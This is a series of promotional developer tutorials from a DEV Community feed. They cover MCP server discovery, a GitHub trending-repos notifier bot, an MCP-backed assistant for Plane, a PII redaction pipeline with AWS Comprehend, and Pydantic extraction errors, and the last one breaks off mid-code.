DEV Community: Tracepilot

The MCP Server Directory Problem Nobody's Talking About

Tracepilot — Mon, 27 Jul 2026 15:30:44 +0000

Here's what's breaking: you built an MCP server. It works. You want people to find it. But discovery is a mess.

GitHub search returns 47 pages of random repos. Twitter threads get buried. Discord channels scroll past in hours. Your server sits in a repo with 3 stars and zero users.

This sucks. I know. I've been there.

Why Discovery Matters (And Why It's Broken)

MCP (Model Context Protocol) is growing fast. Every week there's a new server for databases, APIs, file systems, you name it. But the ecosystem is fragmented.

Here's the technical reality:

No centralized registry exists
GitHub topics are inconsistent (mcp-server, mcp-server-tool, mcp)
Package managers don't index MCP servers specifically
Search engines return noise, not signal

Guess what happens next? Developers waste hours finding the right server. Or worse — they build one that already exists.

The Manual Fix: What You'd Do Without a Directory

Let's say you want to find an MCP server for PostgreSQL. Here's your workflow:

# Step 1: Search GitHub
gh search repos "mcp postgresql" --limit 50

# Step 2: Manually inspect each repo
# Check README, check if it's active, check if it works with your stack

# Step 3: Try to install
npx @modelcontextprotocol/server-postgres

# Step 4: It fails. No docs. No examples. Back to step 1.

Sound familiar? You've spent 30 minutes and found maybe 3 viable servers.

Or if you're submitting your own server:

# Create a GitHub repo
# Write docs
# Post on Hacker News
# Tweet about it
# Pray someone finds it

That's not a workflow. That's a gamble.

The Real Fix: A Directory That Actually Works

mcp.so is trying to solve this. They're building a curated directory of MCP servers. The idea is simple: one place to find and submit servers.

Here's how you submit yours right now:

1. Go to the GitHub issue

URL: https://github.com/chatmcp/mcpso/issues/1

2. Leave your server link

## My MCP Server

**Name:** postgres-mcp  
**Description:** MCP server for PostgreSQL databases with schema introspection and query execution  
**Link:** https://github.com/yourname/postgres-mcp  
**Category:** Database  
**Stack:** Node.js, PostgreSQL

3. Wait for it to appear

The maintainers review and add it to the directory.

That's it. No API. No auth. Just a GitHub issue.
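If you submit more than one server, it can help to generate that comment from data instead of retyping it. Here is a minimal sketch, assuming the template fields shown above; the `ServerListing` type and `formatSubmission` function are names made up for this example, not part of mcp.so.

```typescript
// Hypothetical shape mirroring the fields in the comment template above.
interface ServerListing {
  name: string;
  description: string;
  link: string;
  category: string;
  stack: string[];
}

// Render the listing as the Markdown comment body from the example.
// The two trailing spaces force a line break in GitHub-flavored Markdown.
function formatSubmission(listing: ServerListing): string {
  return [
    "## My MCP Server",
    "",
    `**Name:** ${listing.name}  `,
    `**Description:** ${listing.description}  `,
    `**Link:** ${listing.link}  `,
    `**Category:** ${listing.category}  `,
    `**Stack:** ${listing.stack.join(", ")}`,
  ].join("\n");
}

const body = formatSubmission({
  name: "postgres-mcp",
  description: "MCP server for PostgreSQL databases",
  link: "https://github.com/yourname/postgres-mcp",
  category: "Database",
  stack: ["Node.js", "PostgreSQL"],
});
console.log(body);
```

Paste the output into the issue comment box, or keep the listing object in your repo so the description stays in sync with your README.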

Why This Pattern Works (And When It Doesn't)

The GitHub issue submission pattern has tradeoffs:

Pros:

Low friction — anyone with a GitHub account can submit
Transparent — you can see all submissions
Community vetted — issues get comments, feedback

Cons:

Manual review — takes time
No automation — no CI/CD, no validation
Scales poorly — 1000 servers = 1000 issues

For a v1, it's fine. For production, you'd want something better.

What I'd Build Instead

If I were building this, here's what the submission flow would look like:

// mcp-directory/submit.ts
interface MCPServerSubmission {
  name: string;
  description: string;
  repository: string;       // GitHub URL
  packageName?: string;     // npm package
  category: 'database' | 'api' | 'filesystem' | 'ai' | 'other';
  stack: string[];          // ['node', 'python', 'go']
  mcpVersion: string;       // '2024-11-05'
  tools: string[];          // ['query', 'introspect', 'migrate']
  verified: boolean;        // Auto-verified via GitHub Actions
}

async function submitServer(submission: MCPServerSubmission) {
  // 1. Validate the repository exists
  const repo = await validateGitHubRepo(submission.repository);

  // 2. Check if it actually implements MCP
  const mcpConfig = await fetchMCPSchema(submission.repository);

  // 3. Run basic tests
  const testResults = await runMCPServerTests(mcpConfig);

  // 4. Submit to directory
  const entry = await createDirectoryEntry({
    ...submission,
    verified: testResults.passed,
    submittedAt: new Date().toISOString()
  });

  return entry;
}

But that's overengineering for a v1. The GitHub issue works. Use it.
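Even without the full pipeline, a cheap local check catches most bad submissions before anything hits the network. This is a rough sketch under a few assumptions: the field names follow the interface above, `validateSubmission` is a hypothetical helper, and the date-style `mcpVersion` check is inferred only from the '2024-11-05' example.

```typescript
// Categories copied from the MCPServerSubmission interface above.
const CATEGORIES: string[] = ["database", "api", "filesystem", "ai", "other"];

interface SubmissionInput {
  name: string;
  repository: string;
  category: string;
  mcpVersion: string;
}

// Returns a list of human-readable problems; an empty list means the input looks sane.
function validateSubmission(input: SubmissionInput): string[] {
  const errors: string[] = [];

  if (input.name.trim().length === 0) {
    errors.push("name is required");
  }
  // Accept only https://github.com/<owner>/<repo> (optional trailing slash).
  if (!/^https:\/\/github\.com\/[\w.-]+\/[\w.-]+\/?$/.test(input.repository)) {
    errors.push("repository must be a GitHub repo URL");
  }
  if (CATEGORIES.indexOf(input.category) === -1) {
    errors.push("category must be one of: " + CATEGORIES.join(", "));
  }
  // Assumption: versions are date strings like 2024-11-05.
  if (!/^\d{4}-\d{2}-\d{2}$/.test(input.mcpVersion)) {
    errors.push("mcpVersion must look like YYYY-MM-DD");
  }
  return errors;
}

console.log(
  validateSubmission({
    name: "postgres-mcp",
    repository: "https://github.com/yourname/postgres-mcp",
    category: "database",
    mcpVersion: "2024-11-05",
  })
);
```

Returning every problem at once, instead of throwing on the first one, means a submitter can fix them all in a single pass.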

How TracePilot Fits (Yes, There's a Connection)

You're building MCP servers. They call LLMs. Those LLM calls fail in weird ways.

TracePilot captures every LLM call in your MCP server — input, output, tokens, latency. When something breaks, you fork the execution at the exact step and replay with a fix.

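// Your MCP server + TracePilot
import { TracePilot } from 'tracepilot-sdk';

const tp = new TracePilot(process.env.TRACEPILOT_API_KEY);

server.tool('query-database', {
  // ... schema
}, async (args) => {
  // wrapOpenAI resolves to an object whose `result` is the wrapped call's return value
  const { result: sql } = await tp.wrapOpenAI(
    () => llm.generateSQL(args.question),
    [{ role: 'user', content: args.question }]
  );
  // MCP tool handlers return a list of content items
  return { content: [{ type: 'text', text: sql }] };
});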

Your MCP server gets discovered on mcp.so. Your LLM calls get debugged with TracePilot. Two problems, one afternoon.

Go Submit

Submit your MCP server here. Leave the link. Get visibility.

And while you're at it, add TracePilot to your server. You'll thank me when it breaks at 2 AM.

Debugging AI agents shouldn't feel like reading The Matrix.
Join other engineers who are building reliable autonomous workflows in our community: TracePilot Discord

Build a Daily Python Trending Repos Notifier with GitHub Issues

Tracepilot — Fri, 24 Jul 2026 15:47:51 +0000

What we're building: A bot that watches GitHub's daily trending Python repos and posts them automatically as a GitHub Issue comment — so you never miss what's hot in the Python ecosystem.

Prerequisites

Node.js 18+
A GitHub account (free tier works)
An OpenAI API key (for the AI summary)
A TracePilot API key (free tier available)

Step 1: Set Up the Project

mkdir python-trending-notifier
cd python-trending-notifier
npm init -y
npm pkg set type=module   # the examples use ES module imports
npm install axios cheerio node-cron openai tracepilot-sdk

You'll also need a GitHub personal access token with repo scope. Create one here.

Step 2: Scrape GitHub Trending Python Repos

// lib/scraper.js
import axios from 'axios';
import * as cheerio from 'cheerio';

export async function getTrendingPythonRepos() {
  const { data } = await axios.get('https://github.com/trending/python?since=daily', {
    headers: { 'User-Agent': 'Mozilla/5.0' }
  });

  const $ = cheerio.load(data);
  const repos = [];

  $('article.Box-row').each((i, el) => {
    const name = $(el).find('h2 a').text().trim().replace(/\s+/g, '');
    const description = $(el).find('p').text().trim();
    const stars = $(el).find('.octicon-star').parent().text().trim();
    const forks = $(el).find('.octicon-repo-forked').parent().text().trim();
    const todayStars = $(el).find('.float-sm-right').text().trim();

    repos.push({
      name,
      description: description || 'No description',
      stars: stars || '0',
      forks: forks || '0',
      todayStars: todayStars || '0 stars today',
      url: `https://github.com/${name}`
    });
  });

  return repos.slice(0, 10); // Top 10
}

This scrapes the GitHub trending page for Python repos. It's the same data you see at github.com/trending/python?since=daily — but now you own it.
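The scraper hands back star counts as display strings, which is fine for printing but awkward for sorting or filtering. Here is a small sketch of a parser; `parseCount` is a hypothetical helper, and the "k" suffix handling is an assumption in case the page abbreviates large numbers.

```typescript
// Turn display strings like "1,234", "12.3k" or "123 stars today" into numbers.
function parseCount(text: string): number {
  // Drop thousands separators, then grab the first number and an optional "k" suffix.
  const match = text.replace(/,/g, "").match(/(\d+(?:\.\d+)?)(k)?/i);
  if (!match) return 0;
  const value = parseFloat(match[1]);
  return Math.round(match[2] ? value * 1000 : value);
}

// Example: rank scraped repos by stars gained today (sample data, not real results).
const sample = [
  { name: "owner/repo-a", todayStars: "87 stars today" },
  { name: "owner/repo-b", todayStars: "1,204 stars today" },
];
const ranked = sample
  .slice()
  .sort((a, b) => parseCount(b.todayStars) - parseCount(a.todayStars));
console.log(ranked.map((r) => r.name));
```

Falling back to 0 when nothing matches keeps one odd row from crashing the whole run.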

Step 3: Generate an AI Summary

// lib/summarizer.js
import OpenAI from 'openai';

const openai = new OpenAI({ apiKey: process.env.OPENAI_API_KEY });

export async function generateSummary(repos) {
  const prompt = `Summarize today's top 10 trending Python repos in 3-4 sentences. 
Focus on patterns (e.g., "lots of AI tools this week" or "a new web framework emerged").
Repos: ${repos.map(r => `${r.name}: ${r.description}`).join('\n')}`;

  const response = await openai.chat.completions.create({
    model: 'gpt-4o-mini',
    messages: [{ role: 'user', content: prompt }],
    max_tokens: 150
  });

  return response.choices[0].message.content;
}

You got this. The AI turns raw repo data into a readable trend report — no manual digging required.

Step 4: Post to a GitHub Issue

// lib/github.js
import axios from 'axios';

export async function postToIssue(repos, summary) {
  const body = `## 🐍 Python Trending Repos — ${new Date().toDateString()}

${summary}

### Top 10 Repos

${repos.map((r, i) => `${i + 1}. **[${r.name}](${r.url})** — ${r.description}
   ⭐ ${r.stars} · 🍴 ${r.forks} · 🔥 ${r.todayStars}`).join('\n\n')}

---

*Automated daily update via [github-trending-repos](https://github.com/vitalets/github-trending-repos)*`;

  await axios.post(
    `https://api.github.com/repos/vitalets/github-trending-repos/issues/7/comments`,
    { body },
    {
      headers: {
        Authorization: `Bearer ${process.env.GITHUB_TOKEN}`,
        'User-Agent': 'trending-bot'
      }
    }
  );
}

Replace the owner/repo and issue number with your own. The comment gets posted right under the issue — subscribers get notified automatically.

Step 5: Wire It All Together

// index.js
import cron from 'node-cron';
import { getTrendingPythonRepos } from './lib/scraper.js';
import { generateSummary } from './lib/summarizer.js';
import { postToIssue } from './lib/github.js';

async function run() {
  console.log('Fetching trending Python repos...');
  const repos = await getTrendingPythonRepos();

  console.log('Generating AI summary...');
  const summary = await generateSummary(repos);

  console.log('Posting to GitHub issue...');
  await postToIssue(repos, summary);

  console.log('✅ Done!');
}

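// Run daily at 9 AM; log failures instead of letting a rejection kill the process
cron.schedule('0 9 * * *', () => run().catch(console.error));

// Run immediately on first start
run().catch(console.error);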

That's it. Four files, one cron job. Your bot is ready.

Adding Observability

This is where TracePilot comes in. When your bot fails at 3 AM (and it will — GitHub rate limits, malformed HTML, API timeouts), you need to know why.

npm install tracepilot-sdk

Now wrap your main function:

// index.js (updated)
import { TracePilot } from 'tracepilot-sdk';
import cron from 'node-cron';
import { getTrendingPythonRepos } from './lib/scraper.js';
import { generateSummary } from './lib/summarizer.js';
import { postToIssue } from './lib/github.js';

const tp = new TracePilot(process.env.TRACEPILOT_API_KEY);

async function run() {
  await tp.startTrace('python-trending-bot');

  const { result: repos } = await tp.wrapToolCall(
    'scrape-trending',
    () => getTrendingPythonRepos(),
    null, 1
  );

  const { result: summary } = await tp.wrapOpenAI(
    () => generateSummary(repos),
    [{ role: 'user', content: `Summarize: ${repos.map(r => r.name).join(', ')}` }],
    null, 2
  );

  await tp.wrapToolCall(
    'post-to-github',
    () => postToIssue(repos, summary),
    null, 3,
    true // destructive — modifies GitHub state
  );
}

cron.schedule('0 9 * * *', () => run().catch(console.error));
run().catch(console.error);

One line change per step. Now every scrape, every AI call, every GitHub post is tracked in your TracePilot Dashboard. When the bot fails, you see exactly where — and you can fork the execution to test fixes without redeploying.

Next Steps

Your bot is live. Here's what to do next:

Deploy it — Use a free cron service like Cron-job.org or Railway. Set the three env vars (GITHUB_TOKEN, OPENAI_API_KEY, TRACEPILOT_API_KEY).
Add error handling — Wrap the scraper in a retry loop. GitHub's HTML changes sometimes.
Extend to other languages — Change the URL to /trending/javascript or /trending/rust. One line.
Watch the dashboard — Open tracepilotai.com/dashboard after the first run. You'll see the full execution tree.
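The retry loop from the error-handling item could look something like this. It's a sketch with exponential backoff; `withRetry` and `backoffDelays` are hypothetical helpers, and the default of three retries starting at one second is an arbitrary choice.

```typescript
// Delays before each retry: baseMs, 2 * baseMs, 4 * baseMs, ...
function backoffDelays(retries: number, baseMs: number): number[] {
  const delays: number[] = [];
  for (let i = 0; i < retries; i++) {
    delays.push(baseMs * Math.pow(2, i));
  }
  return delays;
}

// Run `task`, retrying up to `retries` times after a failure.
// `sleep` is injectable so tests do not have to wait for real timers.
async function withRetry<T>(
  task: () => Promise<T>,
  retries: number = 3,
  baseMs: number = 1000,
  sleep: (ms: number) => Promise<void> = (ms) =>
    new Promise<void>((resolve) => setTimeout(resolve, ms))
): Promise<T> {
  const delays = backoffDelays(retries, baseMs);
  let lastError: unknown;
  for (let attempt = 0; attempt <= retries; attempt++) {
    try {
      return await task();
    } catch (error) {
      lastError = error;
      // Wait before the next attempt, but not after the final one.
      if (attempt < retries) await sleep(delays[attempt]);
    }
  }
  throw lastError;
}
```

In the bot, that would be `const repos = await withRetry(() => getTrendingPythonRepos());`. Retrying won't help if the page markup has changed, so it's still worth logging when the scraper returns an empty list.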

You just built a production-grade trending repo notifier. No complex infrastructure, no Docker, no Kubernetes. Four files, one cron job, and a dashboard that shows you everything.

You got this.


The AI Assistant You Didn't Ask For (But Your Users Will)

Tracepilot — Mon, 20 Jul 2026 16:52:31 +0000

Here's the thing about shipping an MCP server: you build it, you document it, you move on. Then someone asks "can I chat with my data?" and suddenly you're looking at a six-month project.

Plane already has plane-mcp-server. It exposes issues, cycles, projects — everything via the Model Context Protocol. Claude Desktop can query it. Cursor can use it. But your users? They're in the browser. They don't care about MCP. They want a text box.

So here's the proposal: a feature-flagged, disabled-by-default AI Assistant that talks to Plane through its own MCP server.

Not a rewrite. Not a new API. Same protocol, different client.

The Architecture

Browser UI  →  AI Assistant Component  →  Next.js API Route
                                                ↓
                                    plane-mcp-server (localhost or container)
                                                ↓
                                    Plane Database (PostgreSQL)

The MCP server already handles authentication, query construction, and data access. The AI Assistant is just a new consumer of that same interface.

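// app/api/ai/chat/route.ts
import { Client } from "@modelcontextprotocol/sdk/client/index.js";
import { StdioClientTransport } from "@modelcontextprotocol/sdk/client/stdio.js";

const transport = new StdioClientTransport({
  command: "node",
  args: ["plane-mcp-server/dist/index.js"],
  env: {
    // env values must be strings, so fall back to "" when a variable is unset
    PLANE_API_KEY: process.env.PLANE_API_KEY ?? "",
    PLANE_BASE_URL: process.env.PLANE_BASE_URL ?? "",
  },
});

const client = new Client({
  name: "plane-ai-assistant",
  version: "1.0.0",
});

// Connect once per server process, not once per request
await client.connect(transport);

export async function POST(req: Request) {
  const { query } = await req.json();

  // callTool sends the tools/call request for us
  const result = await client.callTool({
    name: "plane_query",
    arguments: { query },
  });

  // Tool results carry a list of content items; join the text ones for the UI
  const items = result.content as { type: string; text?: string }[];
  const content = items
    .filter((item) => item.type === "text")
    .map((item) => item.text ?? "")
    .join("\n");

  return Response.json({ content });
}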

That's it. The MCP server becomes your AI backend. No separate vector store. No custom RAG pipeline. Just the protocol you already own.

Feature Flagging

This stays off by default. Why? Because AI costs money, and not everyone wants it.

// lib/features.ts
export const FEATURES = {
  AI_ASSISTANT: process.env.NEXT_PUBLIC_ENABLE_AI_ASSISTANT === "true",
};

// components/Sidebar.tsx
import { FEATURES } from "@/lib/features";

export function Sidebar() {
  return (
    <aside>
      <ProjectList />
      {FEATURES.AI_ASSISTANT && <AIAssistant />}
    </aside>
  );
}

One env var. One toggle. Zero risk.

The UI

Three components. That's all.

// components/AIAssistant.tsx
"use client";

import { useState } from "react";
import { ChatInput } from "./ChatInput";
import { ChatMessages } from "./ChatMessages";

export function AIAssistant() {
  const [messages, setMessages] = useState<
    { role: "user" | "assistant"; content: string }[]
  >([]);
  const [isLoading, setIsLoading] = useState(false);

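  const sendMessage = async (content: string) => {
    setMessages((prev) => [...prev, { role: "user", content }]);
    setIsLoading(true);

    try {
      const res = await fetch("/api/ai/chat", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ query: content }),
      });
      if (!res.ok) throw new Error(`Request failed with status ${res.status}`);

      const data = await res.json();
      setMessages((prev) => [
        ...prev,
        { role: "assistant", content: data.content },
      ]);
    } catch (error) {
      // Show the failure in the chat instead of leaving the spinner on
      setMessages((prev) => [
        ...prev,
        { role: "assistant", content: "Something went wrong. Please try again." },
      ]);
    } finally {
      setIsLoading(false);
    }
  };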

  return (
    <div className="border rounded-lg p-4 space-y-4">
      <ChatMessages messages={messages} isLoading={isLoading} />
      <ChatInput onSend={sendMessage} disabled={isLoading} />
    </div>
  );
}

The MCP server handles the heavy lifting. Your UI is just a pipe.

What It Can Do Right Now

With plane-mcp-server exposing tools like list_issues, get_cycle, search_projects, the AI can answer:

"Show me all high-priority bugs in the current sprint"
"What's the status of issue PLANE-1234?"
"Which projects have overdue tasks?"

No training. No fine-tuning. The LLM turns natural language into tool calls, and the MCP server runs them as structured queries against your existing data.

What You're Not Doing

Not building a vector database. The MCP server queries Postgres directly.
Not training a model. You're using GPT-4o or Claude via the MCP server.
Not rewriting auth. The MCP server handles API keys and permissions.
Not deploying new infrastructure. It runs in a container alongside Plane.

The Caveats

This isn't production-ready magic. Here's what breaks:

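Latency. With the stdio transport, the API route spawns the MCP server as a child process. The route above connects once at module load, but on serverless hosts every cold start pays that cost again. For production, you'd want the MCP server running as a persistent HTTP service.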

Cost. Every query hits an LLM. Without caching, a busy team could burn through tokens fast. Add a simple cache:

const cache = new Map<string, string>();

export async function POST(req: Request) {
  const { query } = await req.json();

  if (cache.has(query)) {
    return Response.json({ content: cache.get(query) });
  }

  // ... MCP call ...

  cache.set(query, result.content);
  return Response.json(result);
}
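A bare Map never forgets anything, and project data goes stale quickly. One way to bound it is a small cache with a time-to-live and a size cap. This is a sketch, not a drop-in: `TtlCache` is a hypothetical class, and the five-minute TTL and 500-entry cap in the usage line are arbitrary.

```typescript
// A tiny in-memory cache with expiry and a maximum number of entries.
class TtlCache<V> {
  private entries = new Map<string, { value: V; expiresAt: number }>();

  constructor(
    private ttlMs: number,
    private maxEntries: number,
    // Injectable clock so expiry can be tested without waiting.
    private now: () => number = () => Date.now()
  ) {}

  get(key: string): V | undefined {
    const entry = this.entries.get(key);
    if (!entry) return undefined;
    if (entry.expiresAt <= this.now()) {
      this.entries.delete(key); // expired, drop it
      return undefined;
    }
    return entry.value;
  }

  set(key: string, value: V): void {
    // Deleting first moves a re-inserted key to the end of the insertion order.
    this.entries.delete(key);
    if (this.entries.size >= this.maxEntries) {
      // Map iterates in insertion order, so the first key is the oldest.
      const oldest = this.entries.keys().next().value;
      if (oldest !== undefined) this.entries.delete(oldest);
    }
    this.entries.set(key, { value, expiresAt: this.now() + this.ttlMs });
  }
}

const answerCache = new TtlCache<string>(5 * 60 * 1000, 500);
answerCache.set("overdue tasks", "3 projects have overdue tasks");
console.log(answerCache.get("overdue tasks"));
```

If different users can see different projects, the cache key probably needs the user or workspace ID in it as well as the query text. Otherwise one person's answer could leak to another.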

Security. The MCP server has access to everything. Make sure your AI assistant only queries, never mutates. Or add a confirmation dialog for destructive operations.
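One simple way to enforce "only queries" is an allowlist checked before every tool call. Here is a minimal sketch: the three tool names come from the list earlier in this post, while `assertReadOnly` and the `delete_issue` name in the usage example are hypothetical.

```typescript
// Tools the assistant may call. Anything not listed here is rejected.
const READ_ONLY_TOOLS: string[] = ["list_issues", "get_cycle", "search_projects"];

// Throws if the requested tool is not on the read-only allowlist.
function assertReadOnly(toolName: string): void {
  if (READ_ONLY_TOOLS.indexOf(toolName) === -1) {
    throw new Error(`Tool "${toolName}" is not on the read-only allowlist`);
  }
}

assertReadOnly("list_issues"); // passes silently

try {
  assertReadOnly("delete_issue"); // hypothetical mutating tool
} catch (error) {
  console.log((error as Error).message);
}
```

An allowlist fails closed: a new mutating tool added to the server later stays blocked until someone deliberately adds it here.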

The Hook

You already built the hard part. plane-mcp-server is a fully functional AI backend sitting in your repo, unused by your own UI.

The AI Assistant proposal isn't about building something new. It's about connecting what you already have to where your users actually work — the browser.

Feature flag it. Ship it disabled. Let power users opt in.

Your MCP server is already talking to your data. It's time your UI started listening.


Build a PII Redaction Pipeline with AWS Comprehend & EdgeChains

Tracepilot — Fri, 17 Jul 2026 15:30:49 +0000

What we're building: A chainable PII redaction utility that automatically strips sensitive information (names, emails, SSNs, etc.) from prompts before they reach your LLM — using AWS Comprehend and EdgeChains' observable architecture.

Prerequisites

Node.js 18+
An AWS account with Comprehend access
The EdgeChains JS SDK installed: npm install edgechains
AWS SDK v3: npm install @aws-sdk/client-comprehend
An OpenAI API key (for the demo)

Step 1: Set up your project

mkdir pii-redactor
cd pii-redactor
npm init -y
npm install edgechains @aws-sdk/client-comprehend openai dotenv

Create .env:

AWS_ACCESS_KEY_ID=your_key_here
AWS_SECRET_ACCESS_KEY=your_secret_here
AWS_REGION=us-east-1
OPENAI_API_KEY=sk-...

Step 2: Create the Comprehend PII Redactor class

This is the core — a class that wraps AWS Comprehend's detectPiiEntities and redacts matches. It's designed to be chained with EdgeChains' Endpoint classes.

// redactor.ts
import {
  ComprehendClient,
  DetectPiiEntitiesCommand,
  type PiiEntity, // DetectPiiEntities returns PiiEntity items, not Entity
} from "@aws-sdk/client-comprehend";
import { Endpoint } from "edgechains";

type RedactConfig = {
  /** Which PII types to redact. Default: all */
  entityTypes?: string[];
  /** Replacement character. Default: '*' */
  maskChar?: string;
};

export class ComprehendPIIRedactor extends Endpoint {
  private client: ComprehendClient;
  private config: Required<RedactConfig>;

  constructor(config: RedactConfig = {}) {
    super();
    this.client = new ComprehendClient({
      region: process.env.AWS_REGION || "us-east-1",
    });
    this.config = {
      entityTypes: config.entityTypes || [],
      maskChar: config.maskChar || "*",
    };
  }

  /**
   * Detect PII entities in the input text
   */
  private async detectPII(text: string): Promise<PiiEntity[]> {
    const command = new DetectPiiEntitiesCommand({
      Text: text,
      LanguageCode: "en",
    });
    const response = await this.client.send(command);
    return response.Entities || [];
  }

  /**
   * Redact detected PII entities from the text
   */
  private redactPII(text: string, entities: PiiEntity[]): string {
    // Sort entities by offset in reverse to avoid index shifting
    const sorted = [...entities]
      .filter((e) => {
        if (this.config.entityTypes.length === 0) return true;
        return this.config.entityTypes.includes(e.Type!);
      })
      .sort((a, b) => (b.BeginOffset || 0) - (a.BeginOffset || 0));

    let result = text;
    for (const entity of sorted) {
      const start = entity.BeginOffset || 0;
      const end = entity.EndOffset || 0;
      const original = result.slice(start, end);
      const masked = this.config.maskChar.repeat(original.length);
      result = result.slice(0, start) + masked + result.slice(end);
    }
    return result;
  }

  /**
   * The main redact method, chainable with EdgeChains
   * Returns a promise that resolves to the redacted text
   */
  async redact(input: string): Promise<string> {
    const entities = await this.detectPII(input);
    if (entities.length === 0) {
      console.log("✅ No PII detected");
      return input;
    }

    console.log(`🔍 Found ${entities.length} PII entities:`, 
      entities.map((e) => `${e.Type} at [${e.BeginOffset}-${e.EndOffset}]`).join(", ")
    );

    return this.redactPII(input, entities);
  }
}
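Masking with a repeated character hides the value but also hides what kind of value it was. A variation, which is not what the class above does, is to swap each span for a type label such as [EMAIL] so the LLM still knows what was there. Here is a standalone sketch, assuming offsets shaped like the ones Comprehend returns; `redactWithLabels` and the sample offsets are made up for illustration.

```typescript
// The subset of a detected entity this sketch needs.
interface PiiSpan {
  Type: string;
  BeginOffset: number;
  EndOffset: number;
}

// Replace each span with a [TYPE] label instead of mask characters.
function redactWithLabels(text: string, spans: PiiSpan[]): string {
  // Work from the end of the string so earlier offsets stay valid
  // even though the labels change the string's length.
  const sorted = spans.slice().sort((a, b) => b.BeginOffset - a.BeginOffset);
  let result = text;
  for (const span of sorted) {
    result =
      result.slice(0, span.BeginOffset) +
      `[${span.Type}]` +
      result.slice(span.EndOffset);
  }
  return result;
}

// Hand-written offsets for the sample string, not real Comprehend output.
const labeled = redactWithLabels("Jane: jane@example.com", [
  { Type: "NAME", BeginOffset: 0, EndOffset: 4 },
  { Type: "EMAIL", BeginOffset: 6, EndOffset: 22 },
]);
console.log(labeled); // [NAME]: [EMAIL]
```

The tradeoff: labels tell the model more than a row of mask characters does. That is usually what you want, but not if even the entity type counts as sensitive.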

Step 3: Chain it with an LLM endpoint

Now the magic — chain the redactor with an OpenAI endpoint so every prompt gets sanitized before the LLM sees it.

// chain.ts
import "dotenv/config"; // load .env before anything reads process.env
import { Endpoint } from "edgechains";
import OpenAI from "openai";
import { ComprehendPIIRedactor } from "./redactor";

class OpenAIEndpoint extends Endpoint {
  private client: OpenAI;

  constructor() {
    super();
    this.client = new OpenAI({ apiKey: process.env.OPENAI_API_KEY });
  }

  async generate(prompt: string): Promise<string> {
    const response = await this.client.chat.completions.create({
      model: "gpt-4o-mini",
      messages: [{ role: "user", content: prompt }],
    });
    return response.choices[0]?.message?.content || "";
  }
}

async function main() {
  const redactor = new ComprehendPIIRedactor({
    entityTypes: ["NAME", "EMAIL", "PHONE", "SSN"], // only redact these types
    maskChar: "█",
  });

  const llm = new OpenAIEndpoint();

  // The chain: prompt → redact PII → send to LLM
  const rawPrompt = `Hi, I'm John Smith. My email is john.smith@example.com and my SSN is 123-45-6789. Can you help me reset my password?`;

  console.log("📝 Original prompt:", rawPrompt);

  // Chain the endpoints
  const redactedPrompt = await redactor.redact(rawPrompt);
  console.log("🛡️  Redacted prompt:", redactedPrompt);

  const response = await llm.generate(redactedPrompt);
  console.log("🤖 LLM response:", response);
}

main().catch(console.error);

Step 4: Add observability with TracePilot

This is where debugging becomes obvious. Add TracePilot to see exactly what PII was redacted, when, and how the LLM responded.

npm install tracepilot-sdk


// tracepilot-chain.ts
import { TracePilot } from "tracepilot-sdk";
import { ComprehendPIIRedactor } from "./redactor";
import { Endpoint } from "edgechains";
import OpenAI from "openai";

const tp = new TracePilot(process.env.TRACEPILOT_API_KEY!);

class ObservableRedactor extends ComprehendPIIRedactor {
  async redact(input: string): Promise<string> {
    // wrapToolCall resolves to { result, spanId }; unwrap it to keep the Promise<string> contract
    const { result } = await tp.wrapToolCall(
      "comprehend-pii-redaction",
      () => super.redact(input),
      undefined, // parent span: set if chaining
      1,         // step order
      true       // destructive? Yes, we're modifying data
    );
    return result;
  }
}

class ObservableLLM extends Endpoint {
  private client: OpenAI;

  constructor() {
    super();
    this.client = new OpenAI({ apiKey: process.env.OPENAI_API_KEY });
  }

  async generate(prompt: string): Promise<string> {
    const { result } = await tp.wrapOpenAI(
      () =>
        this.client.chat.completions.create({
          model: "gpt-4o-mini",
          messages: [{ role: "user", content: prompt }],
        }),
      [{ role: "user", content: prompt }]
    );
    return result.choices[0]?.message?.content || "";
  }
}

async function main() {
  await tp.startTrace("pii-redaction-pipeline");

  const redactor = new ObservableRedactor({
    entityTypes: ["NAME", "EMAIL", "PHONE", "SSN"],
    maskChar: "█",
  });

  const llm = new ObservableLLM();

  const rawPrompt = `Call me at 555-123-4567 or email support@bank.com. My name is Jane Doe.`;
  const redactedPrompt = await redactor.redact(rawPrompt);
  const response = await llm.generate(redactedPrompt);

  console.log("Final response:", response);
}

main().catch(console.error);

Debugging AI agents shouldn't feel like reading The Matrix.
Join other engineers who are building reliable autonomous workflows in our community: TracePilot Discord (https://discord.gg/KzXRAXFM8)

That Pydantic Validation Error That Dropped Your Chunk

Tracepilot — Mon, 13 Jul 2026 16:54:55 +0000

Your extraction pipeline fails silently. One chunk out of fifty gets dropped. You notice hours later when a user asks about data that should be there.

Here's what happened:

graphiti-service: Error ingesting chunk <doc>#chunk-22: 
1 validation error for ExtractedEntitiesFreeform

That's it. No field name. No type mismatch. Just "1 validation error." The chunk is gone. The doc is incomplete. Good luck figuring out which entity field broke.

Why This Happens

You're calling Claude Sonnet (or GPT-4o) to extract structured entities from a chunk of text. The prompt says "return valid JSON matching this schema." The LLM returns something that looks right — but isn't.

The common failure modes:

Field name drift:

# Your schema expects:
class ExtractedEntitiesFreeform(BaseModel):
    entities: list[Entity]
    relationships: list[Relationship]

# LLM returns:
{
    "entities": [...],
    "relations": [...]  # Wrong field name
}

Type mismatch:

# Schema says:
class Entity(BaseModel):
    name: str
    confidence: float

# LLM returns:
{
    "name": "Acme Corp",
    "confidence": "high"  # String, not float
}

Nested structure collapse:

# Expected:
{
    "entities": [
        {
            "name": "Acme",
            "properties": {"industry": "tech"}
        }
    ]
}

# Returned:
{
    "entities": [
        {
            "name": "Acme",
            "industry": "tech"  # Flattened
        }
    ]
}

The LLM is trying to be helpful. It's not. It's generating structurally valid JSON that doesn't match your Pydantic model. And because the service logs only the first line of the exception, you get a one-line error with no context about which field failed.

The Manual Fix

You have two options:

Option 1: Retry with better error messages

import json
import logging

from pydantic import ValidationError

logger = logging.getLogger(__name__)

def extract_entities(text: str) -> ExtractedEntitiesFreeform | None:
    try:
        response = llm.call(
            model="claude-sonnet-4-20250514",
            messages=[{
                "role": "user",
                "content": f"Extract entities from:\n\n{text}"
            }],
            response_format={"type": "json_object"}
        )

        data = json.loads(response.content)
        return ExtractedEntitiesFreeform(**data)

    except ValidationError as e:
        # e.errors() names each failing field under "loc"; log the raw response too for full context
        logger.error(f"Validation failed: {e.errors()}")
        return None

    except json.JSONDecodeError as e:
        logger.error(f"Invalid JSON: {e}")
        return None

